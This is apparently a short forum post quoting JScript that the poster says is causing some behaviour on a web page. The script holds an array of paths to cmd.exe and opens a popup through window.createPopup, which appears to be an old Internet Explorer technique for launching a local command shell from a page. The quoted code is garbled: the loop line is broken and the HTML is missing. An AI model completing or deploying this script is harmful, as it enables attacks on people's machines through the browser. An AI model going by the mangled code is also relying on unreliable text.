Well I probably can't post the code because of all the HTML content, but here is the code that is doing it.

code:
SCRIPT language=JScript>

var programName=new Array(
'c:/windows/system32/cmd.exe',
'c:/winnt/system32/cmd.exe',
'c:/cmd.exe'
);

function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n html+="";
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}